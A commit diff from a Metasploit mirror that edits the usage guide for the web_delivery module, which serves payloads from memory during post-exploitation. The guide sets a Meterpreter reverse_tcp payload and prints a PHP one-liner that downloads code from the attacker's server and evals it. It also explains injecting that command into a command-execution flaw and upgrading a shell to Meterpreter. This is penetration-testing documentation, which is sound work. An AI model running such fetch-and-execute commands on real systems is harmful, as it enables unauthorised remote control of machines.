infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

MS-1196 Minor edits to the kb for the web_delivery module

bug/bundler_fix
tdoan-r7 2016-03-22 12:26:55 -05:00
parent 4c42a74d48
commit 7e5fced46b
1 changed files with 17 additions and 24 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
documentation/modules/exploit/multi/script/web_delivery.md
View File

@ -1,31 +1,26 @@
As a web server, web_delivery provides a great way to deliver a payload during post exploitation,
with the intention to stay stealthy because the payload does not touch the disk.
As a web server, the web_delivery module provides a stealthy way to deliver a payload during post exploitation because the payload does not touch the disk.
Currently, web_delivery supports three different languages for delivery: Python, PHP, and
Powershell. You should be able to tell which one you can use based on the target environment
you are in.
For example: if you have gained access through a PHP application, then it's safe to assume you can
use PHP. If you're in a Windows server (such as Windows Server 2008), then it's probably safe to
say the target supports Powershell.
For example, if you gained access through a PHP application, it's safe to assume you can use PHP. If you're in a Windows server, such as Windows Server 2008, then it's probably safe to say the target supports Powershell.
## Verification Steps
To be able to use web_delivery, you must gain access to the target machine first, with the ability
to execute either the Python, or PHP, or Powershell interpreter.
To be able to use the web_delivery module, you must gain access to the target machine first, with the ability to execute either the Python, or PHP, or Powershell interpreter.
At that point, you would use web_delivery similar to the following example:
At that point, you would use the web_delivery module like in the following example:
1. Start msfconsole
2. Do: ```use exploit/multi/script/web_delivery```
3. Do: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options)
4. Do: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target)
5. Do: ```set LHOST IP``` (The IP the payload should connect back to)
2. Run: ```use exploit/multi/script/web_delivery```
3. Run: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options)
4. Run: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target)
5. Run: ```set LHOST IP``` (The IP the payload should connect back to)
6. Do: ```run```
7. At this point, a handler is up for that payload. And the module should instruct you to execute
a command.
8. Copy the command. Depending on your pentesting scenario, typically you can either inject the
command and get code execution, or run it from the target's shell, and get a session:
7. At this point, a handler is up for that payload, and the module should instruct you to execute a command.
8. Copy the command. Depending on your pentesting scenario, you can either inject the
command and get code execution, or run it from the target's shell and get a session:
```
msf exploit(web_delivery) > run
@ -46,14 +41,13 @@ php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/
**Python**
Python is a fairly popular language, especially on unix-based systems. For example, it comes with
Ubuntu Linux by default since 8.04. As well as Debian, and Mac OS X since 10.3.
Python is a fairly popular language, especially on Unix-based systems. By default, it has come with Ubuntu Linux since 8.04, as well as Debian, and Mac OS X since 10.3.
**PHP**
PHP is a fairly popular language for web servers, especially Apache.
**Powershell/win**
**Powershell/Windows**
Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2
are the first Windows versions to come with Powershell by default. Older Windows systems such as XP
@ -68,16 +62,15 @@ web_delivery would work nicely for a web application with a command execution vu
One way to approach this would be:
1. Start exploit/multi/script/web_delivery
2. Use [Burp Suite](https://portswigger.net/burp/) to intercept the HTTP/HTTPS request, place the command in the parameter that
results in arbitrary code execution.
2. Use [Burp Suite](https://portswigger.net/burp/) to intercept the HTTP/HTTPS request, place the command in the parameter that results in arbitrary code execution.
3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session.
**Shell upgrade**
web_delivery is also useful to upgrade a shell type payload to a meterpreter one.
web_delivery is also useful to upgrade a shell type payload to a Meterpreter one.
Here's how that can be done:
1. Start exploit/multi/script/web_delivery that generates/
2. On msfconsole, interact with the shell, and copy/pate the command.
3. You should get a meterpreter session.
2. In msfconsole, interact with the shell, and copy/paste the command.
3. You should get a Meterpreter session.